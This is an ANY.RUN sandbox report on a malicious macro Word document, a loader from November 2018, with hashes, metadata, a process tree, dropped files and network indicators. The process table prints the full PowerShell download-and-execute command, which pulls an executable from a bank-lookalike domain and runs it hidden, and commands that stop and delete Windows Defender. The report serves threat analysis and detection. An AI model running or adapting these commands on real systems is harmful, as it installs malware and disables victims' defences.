analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

REF_LDS11142018.doc

Full analysis: https://app.any.run/tasks/1f78e3ea-0d4a-4b77-a64e-fbb696fbe2c9
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 14, 2018, 13:08:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: Enpor Support, Template: Normal, Last Saved By: user, Revision Number: 15, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Wed Nov 14 11:51:00 2018, Last Saved Time/Date: Wed Nov 14 12:31:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

DA002EF0B5ED06EE2802D61F51EBC44B

SHA1:

BCDAC14E7F66B15807ABE3068364B1BC9BA9A90B

SHA256:

656992905859DB153A22C8AAEF7F15EDC2165BE74D01B2BD9C98B0D3720DFEA1

SSDEEP:

768:05Cj9aI/2aLcLk9zZdHV9o3a+yAWr/NV7Kk5dy1xYUIq5903:05Cj9b2AcwbdHVyq+TG/NWSq5a

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2992)
      • cmd.exe (PID: 3824)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2936)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2936)
    • Stops/Deletes Windows Defender service

      • cmd.exe (PID: 3532)
      • cmd.exe (PID: 3384)
      • cmd.exe (PID: 3700)
      • cmd.exe (PID: 2292)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3712)
    • Application was dropped or rewritten from another process

      • tmp614.exe (PID: 2224)
      • tmp714.exe (PID: 1908)
    • Known privilege escalation attack

      • DllHost.exe (PID: 3464)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2508)
      • tmp614.exe (PID: 2224)
      • tmp714.exe (PID: 1908)
    • Creates files in the user directory

      • powershell.exe (PID: 2508)
      • powershell.exe (PID: 3712)
      • tmp614.exe (PID: 2224)
      • powershell.exe (PID: 3648)
      • powershell.exe (PID: 2312)
    • Executable content was dropped or overwritten

      • tmp614.exe (PID: 2224)
      • powershell.exe (PID: 3712)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3604)
      • cmd.exe (PID: 2144)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2936)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2936)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: -
Subject: -
Author: Enpor Support
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: user
RevisionNumber: 15
Software: Microsoft Office Word
TotalEditTime: 7.0 minutes
CreateDate: 2018:11:14 11:51:00
ModifyDate: 2018:11:14 12:31:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 12
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 39
CompObjUserType: Microsoft Office Word 97-2003 Document
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
59
Monitored processes
20
Malicious processes
8
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe tmp614.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs CMSTPLUA no specs tmp714.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2936"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\REF_LDS11142018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3824cmd /c powershell "'powershell ""<#about script#>function indowlose([string] $name){(new-object system.net.webclient).downloadfile($name,''%tmp%\tmp614.exe'');<#last info#>start-process ''%tmp%\tmp614.exe'';}try{indowlose(''http://lloydsbankonline.co.uk/docs.lloyds'')}catch{indowlose(''http://lloydsbankonline.co.uk/docs.lloyds'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp801.bat; start-process '%tmp%\tmp801.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2508powershell "'powershell ""<#about script#>function indowlose([string] $name){(new-object system.net.webclient).downloadfile($name,''C:\Users\admin\AppData\Local\Temp\tmp614.exe'');<#last info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp614.exe'';}try{indowlose(''http://lloydsbankonline.co.uk/docs.lloyds'')}catch{indowlose(''http://lloydsbankonline.co.uk/docs.lloyds'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp801.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp801.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2992cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp801.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3712powershell "<#about script#>function indowlose([string] $name){(new-object system.net.webclient).downloadfile($name,'C:\Users\admin\AppData\Local\Temp\tmp614.exe');<#last info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp614.exe';}try{indowlose('http://lloydsbankonline.co.uk/docs.lloyds')}catch{indowlose('http://lloydsbankonline.co.uk/docs.lloyds')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2224"C:\Users\admin\AppData\Local\Temp\tmp614.exe" C:\Users\admin\AppData\Local\Temp\tmp614.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Developed using the Dev-C++ IDE
Exit code:
0
Version:
1.0.0.0
3384/c sc stop WinDefendC:\Windows\system32\cmd.exetmp614.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3532/c sc delete WinDefendC:\Windows\system32\cmd.exetmp614.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3604/c powershell Set-MpPreference -DisableRealtimeMonitoring $trueC:\Windows\system32\cmd.exetmp614.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
624sc stop WinDefendC:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
A tool to aid in developing services for WindowsNT
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 056
Read events
2 414
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
12
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA98A.tmp.cvr
MD5:
SHA256:
2508powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D43H9Q2TDLUCV4TXPZ30.temp
MD5:
SHA256:
3712powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K1J2KL2VWENZZJCWXZ03.temp
MD5:
SHA256:
3648powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U27C6F7MFW7SC9S5YSRO.temp
MD5:
SHA256:
2312powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5VE6OPR5PYPFOBSG6I0R.temp
MD5:
SHA256:
1908tmp714.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2fbinary
MD5:9B3CD103A2248CCD81D20450B7B0DE88
SHA256:65A4484BEF6CC3D3B3416CF074E7707996B155E5910B3184D565C0756B97CEC0
3648powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3712powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dbc08.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3712powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3712powershell.exeC:\Users\admin\AppData\Local\Temp\tmp614.exeexecutable
MD5:F59842BC962DFE1E13AB431B625DD516
SHA256:E73AA75B8133882EE41A634E1025437FF5A3733FB94CBE3D3C07E2E491DF611D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3712
powershell.exe
GET
200
148.72.54.13:80
http://lloydsbankonline.co.uk/docs.lloyds
US
executable
440 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3712
powershell.exe
148.72.54.13:80
lloydsbankonline.co.uk
US
suspicious

DNS requests

Domain
IP
Reputation
lloydsbankonline.co.uk
  • 148.72.54.13
suspicious

Threats

PID
Process
Class
Message
3712
powershell.exe
Misc activity
ET INFO Packed Executable Download
3712
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3712
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
No debug info